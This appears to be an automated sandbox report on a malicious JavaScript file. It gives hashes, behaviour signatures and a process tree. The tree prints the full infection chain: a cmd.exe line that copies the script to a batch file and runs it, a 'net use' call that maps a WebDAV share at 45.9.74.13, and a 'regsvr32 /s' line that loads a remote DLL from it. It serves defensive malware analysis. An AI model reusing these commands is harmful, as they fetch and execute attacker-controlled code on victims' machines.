Analysis
- max time kernel: 150s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20240704-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 09/07/2024, 05:58
Static task: static1
Behavioral task: behavioral1
- Sample: 2035815001653724469.js
- Resource: win7-20240704-en
Behavioral task: behavioral2
- Sample: 2035815001653724469.js
- Resource: win10v2004-20240704-en
General
- Target: 2035815001653724469.js
- Size: 5KB
- MD5: 770f45a1e4733444a42eb7d7d3a87981
- SHA1: b6dc3b63d358eb911494ec3a6899ec1a34ca3a64
- SHA256: 79f047e7fe22c18d409498ea601c2dac3022d58e8539636d36b94f70e1a82ec7
- SHA512: dcc59b0944f1117efdc1510fa36e71e039532a143276a69673b36a2c4724aa1408d754bbd64ac4bcff85a1807e808e4c4f1f683c00e8667e42855b0569984ec3
- SSDEEP: 96:O4CeNKhGUpMeEpMkjozmDpZPqY/6mlhsmlA2pmlh1QMOm5k2MOmE:ZKFW7hwCRmPBkHc
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence check.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Control Panel\International\Geo\Nation | wscript.exe
- Command and Scripting Interpreter: JavaScript (1 TTP)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  description | pid | Process | procid_target
  PID 5004 wrote to memory of 1284 | 5004 | wscript.exe | 82
  PID 5004 wrote to memory of 1284 | 5004 | wscript.exe | 82
  PID 1284 wrote to memory of 3800 | 1284 | cmd.exe | 87
  PID 1284 wrote to memory of 3800 | 1284 | cmd.exe | 87
  PID 1284 wrote to memory of 3220 | 1284 | cmd.exe | 88
  PID 1284 wrote to memory of 3220 | 1284 | cmd.exe | 88
Processes (process tree, depth shown by indentation)
- C:\Windows\system32\wscript.exe
  command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\2035815001653724469.js
  PID: 5004
  signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    command line: "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2035815001653724469.js" "C:\Users\Admin\\wqhjmm.bat" && "C:\Users\Admin\\wqhjmm.bat"
    PID: 1284
    signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net.exe
      command line: net use \\45.9.74.13@8888\DavWWWRoot\
      PID: 3800
    - C:\Windows\system32\regsvr32.exe
      command line: regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\701.dll
      PID: 3220
Network
MITRE ATT&CK Enterprise v15